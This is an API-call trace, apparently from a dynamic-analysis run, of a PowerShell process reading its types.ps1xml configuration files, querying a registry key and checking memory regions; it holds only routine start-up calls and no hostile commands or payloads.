[0077.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.774] SetErrorMode (uMode=0x1) returned 0x1
[0077.774] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d070 | out: lpFileInformation=0x10d070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
[0077.774] SetErrorMode (uMode=0x1) returned 0x1
[0077.774] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.774] CoTaskMemFree (pv=0x229db0)
[0077.775] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0077.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.775] CoTaskMemFree (pv=0x229db0)
[0077.775] GetACP () returned 0x4e4
[0077.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.778] SetErrorMode (uMode=0x1) returned 0x1
[0077.779] GetFileType (hFile=0x334) returned 0x1
[0077.779] SetErrorMode (uMode=0x1) returned 0x1
[0077.779] GetFileType (hFile=0x334) returned 0x1
[0077.780] ReadFile (in: hFile=0x334, lpBuffer=0x2d75838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2d75838*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.780] ReadFile (in: hFile=0x334, lpBuffer=0x2d75838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2d75838*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.780] ReadFile (in: hFile=0x334, lpBuffer=0x2d75838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2d75838*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.781] ReadFile (in: hFile=0x334, lpBuffer=0x2d75838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2d75838*, lpNumberOfBytesRead=0x10cfa8*=0xcf3, lpOverlapped=0x0) returned 1
[0077.781] ReadFile (in: hFile=0x334, lpBuffer=0x2d74c93, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2d74c93*, lpNumberOfBytesRead=0x10cfa8*=0x0, lpOverlapped=0x0) returned 1
[0077.781] ReadFile (in: hFile=0x334, lpBuffer=0x2d75838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2d75838*, lpNumberOfBytesRead=0x10cfa8*=0x0, lpOverlapped=0x0) returned 1
[0077.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.782] SetErrorMode (uMode=0x1) returned 0x1
[0077.782] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cf20 | out: lpFileInformation=0x10cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
[0077.782] SetErrorMode (uMode=0x1) returned 0x1
[0077.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.783] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d008 | out: phkResult=0x10d008*=0x334) returned 0x0
[0077.783] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cf8c, lpData=0x0, lpcbData=0x10cf88*=0x0 | out: lpType=0x10cf8c*=0x1, lpData=0x0, lpcbData=0x10cf88*=0x56) returned 0x0
[0077.783] CoTaskMemAlloc (cb=0x5a) returned 0x22ed80
[0077.783] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cf5c, lpData=0x22ed80, lpcbData=0x10cf58*=0x56 | out: lpType=0x10cf5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cf58*=0x56) returned 0x0
[0077.783] CoTaskMemFree (pv=0x22ed80)
[0077.783] RegCloseKey (hKey=0x334) returned 0x0
[0077.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.827] GetSystemInfo (in: lpSystemInfo=0x10bc40 | out: lpSystemInfo=0x10bc40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0077.827] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0077.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.862] SetErrorMode (uMode=0x1) returned 0x1
[0077.862] SetErrorMode (uMode=0x1) returned 0x1
[0077.862] GetFileType (hFile=0x334) returned 0x1
[0077.862] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.883] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.951] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.952] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.952] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.952] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.953] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.953] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.953] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.953] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.953] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.954] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.954] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.954] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.954] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.954] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.954] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.955] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.956] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.956] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.956] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.956] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.956] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.956] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.957] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.957] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.957] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.957] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.957] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.957] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.958] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.958] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.958] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.983] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.983] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.983] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.983] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.983] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.983] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.984] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.984] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1000, lpOverlapped=0x0) returned 1
[0077.984] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x1b4, lpOverlapped=0x0) returned 1
[0077.984] ReadFile (in: hFile=0x334, lpBuffer=0x2ddc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cfa8, lpOverlapped=0x0 | out: lpBuffer=0x2ddc9f8*, lpNumberOfBytesRead=0x10cfa8*=0x0, lpOverlapped=0x0) returned 1
[0077.984] CloseHandle (hObject=0x334) returned 1
[0077.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.984] SetErrorMode (uMode=0x1) returned 0x1
[0077.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cf20 | out: lpFileInformation=0x10cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
[0077.984] SetErrorMode (uMode=0x1) returned 0x1
[0077.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.984] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d008 | out: phkResult=0x10d008*=0x334) returned 0x0
[0077.984] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cf8c, lpData=0x0, lpcbData=0x10cf88*=0x0 | out: lpType=0x10cf8c*=0x1, lpData=0x0, lpcbData=0x10cf88*=0x56) returned 0x0
[0077.984] CoTaskMemAlloc (cb=0x5a) returned 0x22ef40
[0077.985] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cf5c, lpData=0x22ef40, lpcbData=0x10cf58*=0x56 | out: lpType=0x10cf5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cf58*=0x56) returned 0x0
[0077.985] CoTaskMemFree (pv=0x22ef40)
[0077.985] RegCloseKey (hKey=0x334) returned 0x0
[0077.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0078.728] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.897] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.900] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.900] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.900] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.900] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.901] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.902] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.909] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.909] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.909] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.909] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.909] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
